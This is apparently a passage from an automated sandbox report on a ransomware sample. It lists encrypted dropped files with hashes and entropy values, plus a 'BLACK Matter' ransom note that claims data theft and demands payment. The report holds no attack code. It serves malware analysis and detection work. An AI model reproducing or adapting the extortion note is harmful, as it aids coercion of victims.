              Preview: .<]....M...?..".Ed.?...s....`_.......6...z ..te.<..N.c[..N.Y..gR......^..Rr..C.......'.I2.K..Q.....)3..cT..........S.T..M../..b...D.*5|.....,``...p.i..~bK....r....\jT..Yv...'.p.B..(X.....;k..L1.....3.l~.)...N!...w$%;\.g.H.GE.<./$X.>|8m_...[.BPpJ.Km..#}...h.$...,:EJm.7.vo.]..(..fyS....v.8V;.*t...<.IL....?...@i.....D.M6..N!S...9....eX..}!.m....T....5....W......C....pW.L.).3..d...f4;'....N8....}GI2yi.|..cAn..uIp 5.?nS".n..86.....y..z.,\....9..j......T.=..A...TB..Z..u...dV.hEiT.LW..,P..!rJ.y..|X..)7...m.oR....'..p.....^.'..k.FM....3r....P..%..-3.$.:.vB.1.)..{^q....S..v.7.q).Ef....).).o...X..z.H..w..J.}.;>.!.?....|.....z%........4r.;EN...u..I/.{...........0..XL.%.*........W..Fc7...;.{F.......t.oV).C..@........i3.8.....{..W.L...(...H.O.b.22S.......s+.s...r...o.0...Z|@...-...I..n..x..7..h.$..~.-....{3.;)Vq.._<.*...'.x~M...g...`.L...n.........u.. JE.....#..|..{.8....rs..U....~w..WE.hq.J.H....X~.wM.1.@..d..n".B'...LP.e6 ...w.s..Iz..B.Z...4.d..G^..*.
              C:\Users\user\Desktop\QCFWYSKMHA\JDDHMPCDUJ.mp3.kVuoJyeoW
              Process:C:\Users\user\Desktop\GlLHM7paoZ.exe
              File Type:data
              Category:dropped
              Size (bytes):1158
              Entropy (8bit):7.829557489276598
              Encrypted:false
              SSDEEP:24:QbD7IkHmvoaroCp66RtowFri4Yd8lAFXaZcNZL09GWX+J6QjuSrmOv:jkHIB36stowJodqAFXpZL0dO6QlmOv
              MD5:AE00A9A06555CC065FCCD246D7F07BCB
              SHA1:93C9468ACF6525B276B524348B8F924325B81F36
              SHA-256:D311A84E1076FE7313AB1A1EA47278A9AB2696689DADC73927010BB49037E9B5
              SHA-512:A93FCDF2397A71310B451A4A1F5A1176DFEC6215B94AAB4B2E18939C8914AD44003EA0C5AD2A6DA8BEBC7DAAFF7A56E2AD3B21A9A2926725F6222A56A40F7473
              Malicious:false
              Preview: k..S`.:o....h|..mB2Wn.h.9....<:..JE9.N./(m......=^..%.,.~....U.&y.fm.J.`p.NP(....V"..J.4D*...;Wk....G!.~d....sw.l.+..F!.vC-\d....0-7..n.D.,.9;..;5..<........'X.V[d...@......4....*^8....;..E...l]T.v.. tgn.......Ik..#DIf..@..dl..r/.Me..@vq;z.4T.?.Lx...........<....e..r8q`w.r^.......!.A._{.)p_...D..&Re4.....J.....|y...-`&....&3.@.....a2#*D...F..f...)o...P...%%..]2..t#2..E.X....V.nZ..N...+.|.[.i.......c..$.=.a/.N.Z..E.[.vH.UWK.j|....nV.a.;H.wew.)..AX... ....K.?.1.}..R...?..i...{)Q.a.....`...F..#L.j].X..Ah.....G........E..o.x....9........ ......N.ur^.7k.W.@-f+...n-/a|a..}?W{...<X7.p.P..%..\j..T..,...e.)....N.Xg......$..(..C..Jb...x?M... ....l....S...v&.y..'.3....A.>....!.Wy..P..#^..w..+......Z..z...C..|(......V...T4bi...;,..-..^_..MI|.^...^.D..k/:~t+P......G.].A1`.;....DH'c]..eU..E:.lo.f..W.w...~;..R.zM..1....j..^Q|5....4....(.`.^..).8....|.M-.>2.\sYz.8f.z..Ra.p.(B....+G.=.$.@......`]?..m,6......o@..teKILC.Y.........4.B...E2
              C:\Users\user\Desktop\QCFWYSKMHA\QCFWYSKMHA.docx.kVuoJyeoW
              Process:C:\Users\user\Desktop\GlLHM7paoZ.exe
              File Type:data
              Category:dropped
              Size (bytes):1158
              Entropy (8bit):7.843804492958939
              Encrypted:false
              SSDEEP:24:HsX/M0fbG2FlVvJjwrEiHWmoIOT+7DuZdHIHrbytB:Z0fKymrxFrI+odoHrbytB
              MD5:18E6DD121BE0591F2D79BC44A0D2A7BA
              SHA1:6C7BC83669F436D4C9CF07B413EBF61A1D508EA6
              SHA-256:00FC55209193E6A3D9F919AFAA92F686460B441D94590AA683FD361002DD5F45
              SHA-512:0A80D8ABE4BE6BCDFF42AA1B0E86C348692400ACD778FCCC5444339EAA8BB492E1B0EEC10B1A03B9404CDDAE30735A75F10E2F68695D78DF314F5D9228C55FB2
              Malicious:false
              Preview: .+...D...cA..1....=..d..'-.j. .OS..p.F|.*..I....2..i..K....Ev"..*J.;.{..js..<.4.....G.;.u....J..g....6j..h.v.....f...f...}..".f.N...y..M#.{AlL.dE;.r..%..>.r./...Q.....@9....&7.6DP.0L0s.../.J.h.n.l.kW....AB ".....Q=.....(........y&....C.:P*...D.....z.*..(.... .j.n.".P.............-....i,.9..U..........,5\.V.L).6.W`Qr../.c..@.;..'...TY..16z...`..&.. qe.R..g,..5$..oLB....9^.G...n.x.&....)..h...8..#....=?.....y=...T}.}r.3B..>.e|.*ue..h.......!..V..M..9.?...">$l.Q'|g.... .s/.,....+4...NVV..D..O.DDe(...K>..fAfnB..l}.4...{VU...A....h...#{PP...s..S......T.#...|+...GA...F..w\......%...}.p.^.8..1}q~.a...=..F.".+..c..g.....5.lW1..u...,.x;.nS.njw.....B..jc.^~nTH................<..JJ.EY..._!r(.&\[&m?Qy&.....au..qO....wUR...!..B.X.......l5YX.7..^..1>..V.ca.....iC.....3...vB.~.4Q..i.4..h..z.X;b..).X........V........z.........2<..#....p..f...}@...q.......c.Q^.L....\u."=.. .x.....er.pK.6.k.........].(..8?b.L...8.].I.w.-`0...]..I...(6b.Z#Ff'......
              C:\Users\user\Desktop\QCFWYSKMHA\kVuoJyeoW.README.txt
              Process:C:\Users\user\Desktop\GlLHM7paoZ.exe
              File Type:ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):1548
              Entropy (8bit):4.479946811569468
              Encrypted:false
              SSDEEP:24:NVB4loz8mP/NA1jo66DUetcYRTxRax/ncQcPVs5V0k7jO5K3yFHsZkJP1l:V4lAnNAZo66uYNxZ1Ns8eOmyuZotl
              MD5:F66968C47A64569E2281F65A95991BE0
              SHA1:EF9E3E80BFBEA4C3021B226CB8CD00687013B8A8
              SHA-256:4B950C763006E7C4569DF8742855CEC31BF82F835BD7E2BDCB5F128DB34C82BF
              SHA-512:CB4ACE1B3E891AB100B3950C6BC133B216E91C8978A3AF1FFD75617B606BB7CEB0133F44D37A30A827655E5B84B016D736A732F5F37635BB727E1A5B722CAD24
              Malicious:true
              Preview: ~+ .. * +.. ' BLACK |.. () .-.,='``'=. - o - .. '=/_ \ | .. * | '=._ | .. \ `=./`, ' .. . '=.__.=' `=' *.. + Matter +.. O * ' .....>>> What happens?.. Your network is encrypted, and currently not operational. We have downloaded 1TB from your fileserver... We need only money, after payment we will give you a decryptor for the entire network and you will restore all the data.....>>> What guarantees? .. We are not a politically motivated group and we do not need anything other than your money. .. If you pay, we will provide you the programs for decryption and we will delete your data. .. If we do not give you decrypters or we do not delete your data, no one will pay us in the future, this does not comply with our goals. .. We always keep
              C:\Users\user\Desktop\QNCYCDFIJJ.docx.kVuoJyeoW
              Process:C:\Users\user\Desktop\GlLHM7paoZ.exe
              File Type:data
              Category:dropped
              Size (bytes):1158
              Entropy (8bit):7.821636219081571
              Encrypted:false
              SSDEEP:24:zHJfzzbem/alnIROaGDLMRaB0LEi0tkl/5aLq9OMmStGMyuIoJ:zHhz+BIRDDadA/5dOMmvMyq
              MD5:B7873D7E1B22AF437732655B8359EA3C
              SHA1:472E4759001DB14D50D5E89C75653B8BDB6823CF
              SHA-256:6BEFA2110D92BE5664775EA7CD9A2E0FA35F52E2350A3F2F903708E4741C7772
              SHA-512:87A413C45C90573B99B11E511F695FA4BE423C13FED4C80C0FB3344D99EADA1825B4C2D2735823A99DAB5FE202D3A4993EED8800802A38B553308A7B118C8D6A
              Malicious:false
              Preview: U.>....`...M.....a...s.bdO.8."{h....G.x.~.`..9_=rh..../!...$O.}..9.%..)8`l2....0....|....G"BX......ui...1Q...-..7..".S..yq.&.C.s...=....7};.'%.T.....7..>Y.....:L.j...g.`.(6.....{.....c....a.-.).wX.k..=.X...[...U7..4..GU..].F&.|A+cB~...9.r...-H. ...mYA.....x.)'mY......X...........s.J..x-7(.uW.|?.wc..R<.._.../Ue.Am..n..6.4...V\.)(.Z..X...;.Ca...k..v....8n..r.]..i.....7......|/3&....%=...4|C...Lr.B`L.........hB...f..../[.N.8.. K...w..f..H..DK.4....C.Pz.1.}..w.2(...O.`A.%....~o1...t..T.,..y....>.}-.d..TX.....4.P...~I..U8y|....g.,.........w..........&.......;{......iO...M....Z^K..X.F...".~..S...j,...3.8.fsH.qH....{G.`.h,...B.x..G.<......&i...0.....n.\R.lJ....H..i.E...........r:)...de.e.7K...Y.wdn.w.....h{..3..W.g..p]...@",.v%...v:.-Z.D.....r.k..]....!@....r.6]..{..%\.......F.E.g..&!....g..w.\."....,..4....W.....ePg.S..........<U.[2[.T].@.|..g.R.c%.H.N.0...k.Y..R...9.x.H.<..N.^...DC....!.(v....$G=..H.u..p....h.]h&..w....c^5w......M..$.1.`0r..w
              C:\Users\user\Desktop\QNCYCDFIJJ.jpg.kVuoJyeoW
              Process:C:\Users\user\Desktop\GlLHM7paoZ.exe
              File Type:data
              Category:dropped
              Size (bytes):1158
              Entropy (8bit):7.825968531189817
              Encrypted:false
              SSDEEP:24:cl8BesQY5j2l/fS3pICcOYsaW5sxN6lGDIu3Hz6hEaDoM:JwsfJ2l1ORavb7DIu3HepkM
              MD5:FB92E33AC0EC4CB27243D491225B5C05
              SHA1:C4F6B19C121C963ED5FF57965CEBA25FCC36137D
              SHA-256:FDB7C1C6D5CCFBABFF7E34D3C8C7EDF169C9D5E3DE4CF680E1D0068E10D34D1F
              SHA-512:82C3DC5490B239E59582D00CE91EBBF88683540A6DCC881B06A3C7F4FD01B6F52AEA40DB39448CC799DDCB61F2D143AAA77C27186F70D77CA3590A99B573D827
              Malicious:false
              Preview: |.M..+R...N...pn.x..;.^L(..n.L.*............N...}*b..7..2Q..O+j/xM...#@J...Ry1N)..!....i..A.B....>J.....Y^(.._.e..P..PV.X)o.h..8].g.h...=.c;8...x.M.k..g.......Z...:.V.h..|Q..fU......1.1h`<~...R.RT..".....+B....=!R...k..P".E..a..|.....J.._.s'...v2"........No......fx......>...8...........%.{.i....ky.=.....2.1p.)`..!../Nn.k.".b....n.zr..P...L.6..D"n.?...x.4S.%H..q..%d.5.$..."..OR.q....bGM...&.jf..2.*.zb...$..)...r+..X...|..e4.)..W_....Q4.5.z.....(...V...?.]g..s.h3.a.}.CA...#=.=.3h.....'.h.x{<0.=..J....3.......b./....yg...!..q1.e.^..v.. p.M...p...b..]}..b..>77..o....02l...m..!.un......y.}....._Y..E.$M.J.eaD:.\O.q.$.h.M....{.({.....rm._.s\......B.~k.2......d%...j.T..}....h...e.........^A.2~M.q.e74.......... .*..A.y..X...$.w..0.......1@.).ws....@..HJ..JX.......?'!...Fa'.^P.N.5#$M.<.T.3Cx8.#.%..R.n.$;..|..")#....$o.Y...n.=..............+5A..\.C.V.L../.>...#.;..Do.N.....;..5.R(.K....*...p.0.........0...8...Z}.8gNL.X..{Xv.Rb...:<.s$..e..M!.J.....L.`.g
              C:\Users\user\Desktop\QNCYCDFIJJ\EFOYFBOLXA.jpg.kVuoJyeoW
              Process:C:\Users\user\Desktop\GlLHM7paoZ.exe
              File Type:data
              Category:dropped
              Size (bytes):1158
              Entropy (8bit):7.8299432286669814
              Encrypted:false
              SSDEEP:24:MNeDaytrCuf5ABN5GroAxsphloExmEEMRwltPuSZD0KZ:8ylJ52N5OjxspcEmEatWSF0KZ
              MD5:6A71C03BF10837F1072AF5F8511AEFCD
              SHA1:FC70FBAEEDA6B71D753D2520D16647182FF0602A
              SHA-256:730EAE456B64177BE472106EB5EC4526BF0B6939F744804C6ECF20E3008720BE
              SHA-512:FC2379BE6620F7C7EFB50D1736D3FD6508C2974B24C525D179F72AD25616B9AFF44E31B813623F4F413C2E3423ED9DAEF484460CBBDCAA1AF11F704CFE4E2733
              Malicious:false
              Preview: qp..(...H...u.l..V...B.*.z.4=EhU..d... .H.....x.Da".DY.+aihCB.t...I...c.o.k8......gO.Z.qlq..h..L.9u.4.....s.!......\.z.......... .}AU...........#oN..T....l.G,\...fp6.6[...A}..y.~.S...W....AQVL#.zYsc.<...3.m...2[......../.X.........O7....f..(.......?ZMT..0....4.Lk.......%?.......(...^.C.f4.&.!.........v./}.@.......@l.C.....7..D.8a..y.)N.>P.......Yt.u....z.I..R....+.yeY\.T.H...\.....~~............B0....:......sG6z.t...a.j....t...[..T..\........M{.a.W....V2t..aq..Q##}S..![.v.9}R.J.0..uB.v8/(.F....R.`p...'..l....X?>.I.}.]+.....F{.........$W<}.|..Y..(....;....|.M.9.Z..#..&...~..l...{..3w...Rc}......v.Lg..7.....Ww..aMK.zgf...a.+...v....~....Z.3[^........]......l.!>c.Q..=....F........T}....x._.."......-..cF.....W..Y..zNU[e...<.F.......b.+...J.-....ON.tt.i}...L.0E.m]...!.D.:.3....*....7[...;..B.6.b2..&T1.....}..X..K..,.kd...........G.i..+...C...{SXV....B..C$.....,.....Zh`..[.S.[.M...?p..?.b.z.'.P....p.M.Z8..f..sj...h."R.M.'.8o9..._-..6.{G.>,..A../
              C:\Users\user\Desktop\QNCYCDFIJJ\PALRGUCVEH.png.kVuoJyeoW
              Process:C:\Users\user\Desktop\GlLHM7paoZ.exe
              File Type:data
              Category:dropped
              Size (bytes):1158
              Entropy (8bit):7.852288983751011
              Encrypted:false
              SSDEEP:24:E74fvbWO8N0MFwkx5J3gfiHrqFsd3K9ReRTFYhROa+f0U8Gu:E74fB8agxx5mfiLqKxcKZOnbUlu
              MD5:75EFD50379746B37DED838DEE0564202
              SHA1:96C5B82EF514603853463E56952044ABDC1905C3
              SHA-256:2727C9D8DE226582A4C50327EB0064AB91E034550FDE3F495EF494F4D9DFACE6
              SHA-512:3A85C4AAF26A4E688B7930B8ED5613D7BF9E046EC43EC5224305798034425723B6B438B67E4DC02B447FBDB81DBD9FE47D4FA14D264BCD037A3FD03FC9AA334B
              Malicious:false
              Preview: {.j.bg.c..0....fb..q..X..~`u..+./.[.../...9w....?oJ+n8.b....3O!1.x.....PV%.x.[.To`.Y...A.\Z..kjh...N.U^..\WXacf]...v......w.e.=A...<.O......u~..h+.}x.K..C.y[.f.v.2.d...|.*~m4....*....=.5....(.[.....K..._a.:7SrIs./.!.1)....Z..p........#^#D.....H..n....PiS.F....|.H.....=.h..UJ.i.v;."N...aNeLe;.q.Jd. .$...K%y.d..{...'.NN3JDY...^...Q........a\./2.o..L......J7L...:.....T...TS.w).Z.rN-....`...c.Jf...;.A.}.q.t<../...1......*......[.n....OX6......~.oyj.......d.&!?.}.XZ.H.....N....*G0!....*^..^..;w..}..%g.N.......z-ZT.s.s.r]V...nn.......$I.......C..+.?.V ..n....V.'..[B.......d..>..9|.@..#....T.=..Q>.fyj..f#mP.../L.X.tf.[..:..#CCP.z..y.....f..&.g.....,............S)..:.T.."1Mr.W....E...9...9..W....K).k.P...............uM..Q/.K$............5).u.fP!..$.7..Z.. M].gRir....e....L*X....)ea..9Y'....yJD.c]s....m.I.U..R..v..'....X|$.u....._..y.....}......RvH..v..z.}.3.C.......i_.>..KB....e.>\1n.B...........42.m....kL..."z...h.FX'>.3.(bJa$....).N./.J.
              C:\Users\user\Desktop\QNCYCDFIJJ\QNCYCDFIJJ.docx.kVuoJyeoW
              Process:C:\Users\user\Desktop\GlLHM7paoZ.exe
              File Type:data
              Category:dropped
              Size (bytes):1158
              Entropy (8bit):7.850911281426769
              Encrypted:false
              SSDEEP:24:rmeO80/r4mqpYdY2s5N0jcfOP5/rQkOMDmj0dAiYTHzi7vp493dhD:GT3psZOPykVD2YAiiiDpC3dh
              MD5:96E8B4CC1B94C1ED9EF496BEDDB87234
              SHA1:B401BB0750E1E290D8449D7848091346022F4C92
              SHA-256:45E9067F8967019E981D47932F7C084577C8021F0ACBA15DCC4A947781B8EEC0
              SHA-512:6FE940CF4CF845FF5EBC3B27B21ED87B1651DCC71193B63E6267A89986F21C60B579E6814CF2165F8115EF88737A991880F012AA14A3349D3C9BD2DA41E842B2
              Malicious:false
              Preview: ....c..'u..._.L/...r..B:.E.-.%.p.....K........*...d.Qp..q.(..v..3.G..h.69Gte..g.F!...+.._v.....n.(...:......`.....bA.....Yd.....*r...++=..|....C..ak.&6pg.._...:.d...t...Q1.Wj.....~.ax|...9o..{].(..p.9...v....7.....<."<Z...P<..0.....J........fn.~......1Q..v.....,~.N...:...&..j.B..!..:...l...Sh...Y..L...!....|.A;xO].. ^.$..>.j;.`.........[...27?...A.o.6.,..3..i....\..q..|.-.............Vf/....+..N%....tm.9Xf_..H3...8(&X.Z."'.x]z...5.BF....[..+D.[p."....<...A.........i..B.^..z....F.O.s....^.2zkpZt[.{l..a..!.......ag>.........-.qK..H.Ta%lG.y8.....(.N..$R6........X.(d....bs......{T......-y."..F$.o.]...(......=....S.\..o.}nt]I....../q.3j..m-.Y.K..6........IU..v.l>BO.1.\L.......][v......4.1..P.,.R.??.4....3-..A...tq..B..NeG..;.wm.r2...+..h'.l.........o..C.o/..6...N.*j..'[sK*of.D......+|,7a..y.:wB.....9.nf.U..;P;=........s..W....9..=L. G.....-..c.9:....*k.4.4..%.4.....}...I.B...4[....`(.._.L+......}.....A%.^.[.?0+2..5.'j.).#",.O#....]E..{....n.f.
              C:\Users\user\Desktop\QNCYCDFIJJ\SQSJKEBWDT.pdf.kVuoJyeoW
              Process:C:\Users\user\Desktop\GlLHM7paoZ.exe
              File Type:data
              Category:dropped
              Size (bytes):1158
              Entropy (8bit):7.8239107025306875
              Encrypted:false
              SSDEEP:24:jszvHxDuFwx0pzba8CyJ22VuBCCRH2oxjkAphx8JMddLR3x6/LOM4cd2Y7/ROUvZ:j6uqx09pCy9zCYqYA3mJ4R3x6/SMvLRV
              MD5:4260BF5F2EF36FE634810B6E051A0B74
              SHA1:F4D118F545C806768666F958CF3B0302C92D7C46
              SHA-256:E014D2DF769C6D069A9EAF7AA4DC2C446D964A783F3BE534C6AB0BA0634DF3D6
              SHA-512:4B30573F0A27EAC8E4DF17B67E71029B1D6457A2DE0CF8031EF248F4ABD3F45B2C43421FEED23ACD0DED48F7F04F71DD68736D6E1C9D7E6358071DC8B6EB8353
              Malicious:false
              Preview: ...;.......>.|7u...0..po.CJ...p..G...7...56*..Ck-V...?....?........b.!BqIgk..6z.x..8S....,@cP=m7....I..zE..O..qj...0........~. ......8..2..G....a..(y.P.....2#..J.............g.I.4..T.(..pO.. K..[...J....)mySa.#.......D.:. ..j@.{.k.Q...Z.Z...<L5...e....P'.T....~\..g._%...{V.Z...1H.....X.C..:...B.....7..L...\.B..-..r..z..I;.3....z .a.SW#.....".q..1 .2......./5...M8C.....NTOC...K...k..#R.}.5..GG.V..|..b.._.#.6.lr.s.@..#6v].:s5.........7S..6..Ls...$....E.I&9r.....2U5p....$.5.4..e1.....Iwl|M....\...C.).9.....p....2....?.5q...Q...1a....!.).....w.A..@....mV..i......*.)%..........n.K..%"8Qg..-|..~.Ux..g&.....S.i#.r..$..S]2..'53..w..}.1.vp.+`.|N..K..F\.9...U5...z.9......4|wx...l..)g........;q...._u........$0.....oQ.;..*Sb.a.......2.7.Z..%Y"....5...Qi.>...x.A.B..,..Lf..D.P<.f..l-V....T.....DV...=.:.C...@..%.w&.:.T.`h...?d".c9...4....K9.JE+%S.6,.&.C.v.._.|...-....$...Q.....q.....j..._.Q.@.Z._..g1U..D...w>...?..z.J...N\......*{.u.H........N.B3a.[.
              C:\Users\user\Desktop\QNCYCDFIJJ\SUAVTZKNFL.xlsx.kVuoJyeoW
              Process:C:\Users\user\Desktop\GlLHM7paoZ.exe
              File Type:data
              Category:dropped
              Size (bytes):1158
              Entropy (8bit):7.834594877553525
              Encrypted:false
              SSDEEP:24:ISFEP+gP7yRIcP14xT2tZ9x3bEkEsZiZaJTe66clxUJ6n:aPkIcCEtZ9x34XsS6s8n
              MD5:B63A60C1EB8DB03B2C5F764342642190
              SHA1:602BC927FE80FF33EF6F2CCD2411AE582DC9C326
              SHA-256:27793897F159B601398D13CAA12395CA421257200416E9F328B1EAC970F99CB9
              SHA-512:E960F2A0DCA2FA8AB3C5012C4F25DE192C0DC83577F9F8BC56E87DA1EF0B9841E9FA56516DAA5F2DF74F6D9A105F0FA730E8349BC7CCA883F424235F16FE06BF
              Malicious:false
              Preview: <Tut3...x....W.qj..=K.$$.iy...02.|.z...J.aV.j;c.j....H...M;..."'...Y.Y,...l@gP..7.`...~.V@.!......W]).9.*..W....s.yI..\M.I.[7....12..m..s.b.\)H.q.......r[&P..im....>....O....rS*...m..s..B......;B...?....w.XwB_..&.....@.0Ef.@.i.M0..qX...U.....p<...?E.f..LV.....D..E..`..(c .D..k...V?.*1./2nX6]...M.i..[=..r.pM...P[.......t...f....A.j...%...l.}..;.Fs....fz..&........t0....d...P.x.p.....4>\=.(.....J..Q.o9.9.3.Uj..A..r......~Q3.'.d../....1D'Dj#.q..:...\.{U.....+.N6.}H..$f..nK.=........p..3./.4.Vjbr.&*..v.....}.N..4s...N.}|.n..Q.....&.+.b.;...]._*R...n..Cd...aR....[D#.~.[...`.%``..Ec.r*.c,y....s.W.M.A....X.}..{;?..>.H.W.....n.yl..'G./.7......Jr....x?...G.....z.k..v...;.'.5......8.3../=5.%. .....2.a.-.+#]k..e.|.#.a......Mm...6..d?.o.......S......Kt...[.4.|.q......z2..,..IO9.?2.H...'.4.=..).k.\.UK.H..h. .*..#4..>.........g.....\p.M%w..F.71..a...s,.s..Lz.zE...@...T....M...$../..O...:...#.`.....U.....8..d>...M.Ij;.....-..};.|yXVH.e..D...7I$R
              C:\Users\user\Desktop\QNCYCDFIJJ\ZGGKNSUKOP.mp3.kVuoJyeoW
              Process:C:\Users\user\Desktop\GlLHM7paoZ.exe
              File Type:data
              Category:dropped
              Size (bytes):1158
              Entropy (8bit):7.816991582016821
              Encrypted:false
              SSDEEP:24:FbpEtXH/W3GOpwX01MQ1cPPAzWc91+FV2g56SFjRCa0Ub9oIdwq6le1rN8Fupig:FbtGE60zOAzZ+FA7SWa0K9oIdZ6lcB8+
              MD5:20A129543B0FE76E449F7E54702588E2
              SHA1:FEA1FD338DF2BB16B614976889D4B949CE327C18
              SHA-256:DE05D8A0AD0AA8B38ABD829643935F3FC48B8E2F7383E457BAE5731B7B3BFF04
              SHA-512:17224ABE2A42FF81433EF4604832524EE7885B7EFD1F339283B2D1D35C4739CBC79211C3A15EE8F4ECE85D4BE7FC04852D2D30734E90EFA5D63412FC125F6D98
              Malicious:false
              Preview: ..R.L.T.F..x.W...6........q9.N.f.EH|d........t...p......AzY. ........8.j;.&..U.J_.3.."U.m......2&9.P$..D..<...5...v.Rf~.&.O..=..jgsc.VY]R.z.F..xM.!..w.$#=.i#z..3.&]7.l.z.U...7j......,...{..$".I.%T...D^.".^".K.>...<...P....?..8."].M.......J.B........v.Z.T.RWZz.5N..u.....W.o....M....V..6_........&5.....mz.*..z";M..n.|o..gz.4.?.T...?wy.WZ...M...4.....p...h...Jz4.b.0..k..ps._...I]X..e.....t.0#d...z*t..o-... ..T.j+.....|x...s;.0l..K..z...a....d.F....(...j..{...[..B.Z.|.KQ.......{.M..."\..]..#.<..$..Y...J.@.....H.Hv..>;5!p.R[h6.Y..s..-...L.s.+.N....rJ..N.P!....~..={.)...q.....C.KD.~5.P(.>7.(o.....G........z...Y..2r..Kx.......P.......xLN.`+.j.@...&.....\.N..%.-.b.^R-a.......5........<`h..}m....:..c..~....kO...n..E(.L...V.i4s.,.a.s..M...G..-*-..N...G..FY.8......~I...C...\.....!..S.\ ...O.......x...C....NI....F..D .....> 6....jq...JJ......&....Ab..b]x.R..{.4..;...a)+...I....i9...B...|.... h.....J....g.f...9....n6= .\......<vk........K.wi(
              C:\Users\user\Desktop\QNCYCDFIJJ\kVuoJyeoW.README.txt
              Process:C:\Users\user\Desktop\GlLHM7paoZ.exe
              File Type:ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):1548
              Entropy (8bit):4.479946811569468
              Encrypted:false
              SSDEEP:24:NVB4loz8mP/NA1jo66DUetcYRTxRax/ncQcPVs5V0k7jO5K3yFHsZkJP1l:V4lAnNAZo66uYNxZ1Ns8eOmyuZotl
              MD5:F66968C47A64569E2281F65A95991BE0
              SHA1:EF9E3E80BFBEA4C3021B226CB8CD00687013B8A8
              SHA-256:4B950C763006E7C4569DF8742855CEC31BF82F835BD7E2BDCB5F128DB34C82BF
              SHA-512:CB4ACE1B3E891AB100B3950C6BC133B216E91C8978A3AF1FFD75617B606BB7CEB0133F44D37A30A827655E5B84B016D736A732F5F37635BB727E1A5B722CAD24
              Malicious:false
              Preview: ~+ .. * +.. ' BLACK |.. () .-.,='``'=. - o - .. '=/_ \ | .. * | '=._ | .. \ `=./`, ' .. . '=.__.=' `=' *.. + Matter +.. O * ' .....>>> What happens?.. Your network is encrypted, and currently not operational. We have downloaded 1TB from your fileserver... We need only money, after payment we will give you a decryptor for the entire network and you will restore all the data.....>>> What guarantees? .. We are not a politically motivated group and we do not need anything other than your money. .. If you pay, we will provide you the programs for decryption and we will delete your data. .. If we do not give you decrypters or we do not delete your data, no one will pay us in the future, this does not comply with our goals. .. We always keep
              C:\Users\user\Desktop\SQSJKEBWDT.pdf.kVuoJyeoW
              Process:C:\Users\user\Desktop\GlLHM7paoZ.exe
              File Type:data
              Category:dropped
              Size (bytes):1158
              Entropy (8bit):7.841694270264966
              Encrypted:false
              SSDEEP:24:oHxlL7QEqDIrxRLekzLgAttl3WRbHhfznFQ29Sv2cBrQvU6grM4PrX:o/3QXIrxRLrvfGRbJznFn9Sv2aQcTrMo
              MD5:3D0BFE122B906F2E57D398E554C8B4F3
              SHA1:11EB9C7C8A05A73BC944230C7C0129FF2DE4F872
              SHA-256:53CBB09A9AB5B71CDAA19E45C8C7A7176BF91680ECF73F54647074D7B1D7917D
              SHA-512:0C7F75B60599B8D396DD484C35AE0E9B640DC88C53CEE77CCA26195BA7E2D97DEF976A1B3C68FA34F0067C766186327F7F72FB63D9C608CA78A96142185B7DB2
              Malicious:false
              Preview: .j....O..a]^...p..A>7c/7....,....>.u.N..tP...<.WX...!.4......J.......)Vv..*)c.....,..N0u.e!J...........X./.lt1..oJ.....;......~..S....e.#%...jxn;.......8.o..SW..}.#.L..J..h.JO..L,.b.. ...mlm.m..>.sO.<...9.n..H:%.2H.S.}t..KMYp........~.p.P..+..N.".......*C.5...}.......-*5U_.HNe.....7fq..[2>..6x..w....a.l.aq.LGk...vP..XX..y....;;...#..........a.A.|W._..Q.ahQ .s...$2....X..].]:..@.(..?GM..y..B.V?......=..{n..D.".'wz......9......R.si.w\....0..zi..?..n.vN.....9S....R..x...1....fk.....-r..S.d.C..p....Q..z.N?'..E.C.J&g....../%z].4C.~}..HG.}.l..^;;..9/.8.MI..|z2-7...*8.K....?.^....5P.B8....i.l.@O........*...0I=ab}.a... .....;e.y....na%.6...*R.'...r...p...GG$........$.....K.gUk^.\.....&,5a..s..b..6.......r....DD..b#38.@..7w4.B...>[..Y). .P.P..`&......xj...'.J.....6..A...xK6...._...x...{&....1'.......=.L..o.G..{....j;..vZ.kHo1Y......P...`.5.......1.}6/........q.Y........%WD.3......wT8'@p.6....G......w....}Cb...5.....m.u. w....$$.~.G..[)..]H.L.N.py...
              C:\Users\user\Desktop\SUAVTZKNFL.pdf.kVuoJyeoW
              Process:C:\Users\user\Desktop\GlLHM7paoZ.exe
              File Type:data
              Category:dropped
              Size (bytes):1158
              Entropy (8bit):7.822253745374509
              Encrypted:false
              SSDEEP:24:Ldgpm7LNQk0bVClDA4SrDQU0EpjywsOZj9gK94g:LmmWk0bVqiZPNZj1
              MD5:157350CF8E5EE01F267E907AF1B42C26
              SHA1:A79436B2E6FA683093AD377BA24520A03A84CC3D
              SHA-256:111497C704CAC66EA1A5356508157076870F88479B547B593FBDD13AF26AB9A7
              SHA-512:1EBF58EABC08B39A05A68A13CAE4D725BBC974F67A80B8E8C8F23128A851FFB1ADD4F31CF0FD72CE86992DB023C6C96DE073F75C0412316337BAEE0EAD0DB1BD
              Malicious:false
              Preview: zB.u.10.3.P.l?8Qx.."3b$A..w...^.[....2.n.Ss.%...L...N.ve9..H..bkN..2.._#.n.I..~..KO..n.7.v..... ..R..y:7{......q....\S.....).....s......(.....S.b%..>nq`.{O}..,'$. .....*u...<F...O..$A.D..l..%.d.....i...g..(..g.-.z..z.Kx.%..Y ..&.].fCJ....Q{.?].p.5......:Sls.zg.Yd..6./.%....."....J.`.t.. ..0.=m........4.f4.4Yg)..R$...Mt.etn.......A0...3.-.>i...f...Ms.=...=...z...x..j......@7...o....,..'NL.$6A}.(..fw.....$&/.{.DHx"...!...l..G.....>+L.......Y.a.....Td.u...~.<...?4....+..88.S...$.A...z.t.A...=j.[.u...>`......B.#.+.#.J.&EQNO..p.Ww....;.6.@..\.!).....h[O._.x...z.Zsy~td.FC.YQ......P......9..._......%........._.*}.x....X. Q....(...P.2.=.!t.vYsu.7.e..37.2.@`...tu..yy.9...v..i.`i.`O@K.k....z..{....l...%....$"..Y..n>..#3]..i.zT.J. .M...!.....'....^b.7......_b[.......kB..N.p......1...B-=.....#.94.4@.^_.9@.....q...Pxo.7....Q[F..B....`.Db....Hd...f.......TE.(..Y..x..^..7.7..z<.{....... .>.k..c...3..qz.m....:..5c.`...e.(c.. ......SN.l...'tM..
              C:\Users\user\Desktop\SUAVTZKNFL.xlsx.kVuoJyeoW
              Process:C:\Users\user\Desktop\GlLHM7paoZ.exe
              File Type:data
              Category:dropped
              Size (bytes):1158
              Entropy (8bit):7.835906444490478
              Encrypted:false
